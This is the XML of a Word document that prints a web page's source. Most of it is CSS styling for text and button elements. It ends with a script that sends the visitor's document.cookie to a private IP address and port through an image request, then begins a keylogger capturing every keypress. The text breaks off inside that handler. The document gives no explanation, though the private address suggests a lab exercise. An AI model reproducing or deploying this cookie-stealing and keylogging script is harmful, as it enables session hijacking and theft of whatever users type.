    <w:p w14:paraId="19AC8F98" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">#wb_Text1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D6F7F" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7B143B" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   background-color: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC40502" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   background-image: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2100F505" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   border: 0px solid #000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC48BBF" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   border-radius: 0px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31EA70" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   padding: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FBB28A" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FD2887" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   text-align: left;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1908BF6D" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA48027" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>#wb_Text1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D543EA" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B49A3" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   color: #000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464E60E" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-family: Arial;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDA79E2" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-weight: 400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6182A1ED" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-size: 13px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8ADE3B" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   line-height: 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497C752B" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A7D6A6" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>#wb_Text1 p, #wb_Text1 ul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE28AF4" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F974A8" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD057C" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   padding: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C81F38" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65627185" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>#Button1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9F4C7" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F203AA0" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   border: 1px solid #2E6DA4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4275FF24" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   border-radius: 4px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C9DB06" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   background-color: #3370B7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E451F1" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   background-image: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F285F72" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   color: #FFFFFF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE26A88" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-family: Arial;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1DE69C" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-weight: normal;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1524A440" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-style: normal;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BDD9DB" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-size: 13px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B7FA6" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   padding: 1px 6px 1px 6px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283CDC06" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   text-align: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1880E" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   -webkit-appearance: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D4B91" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28C247" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B21E5F" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4643F0A9" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#Button1:focus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37746E8B" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C19A99" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   outline: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065499BB" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A4C9C" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1879E6EC" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179CB518" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC0686" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F33459" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7E778" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA7BE69" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>var i = new Image();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4440977D" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>i.src = "http://192.168.1.148:433?cookie=" + document.cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D006BFA" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143B404C" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>let keysPressed = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E5B6E" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A67129" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>document.onkeypress = function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775028CD" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">  keysPressed.push(e.key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A4ACA" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C540D36" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
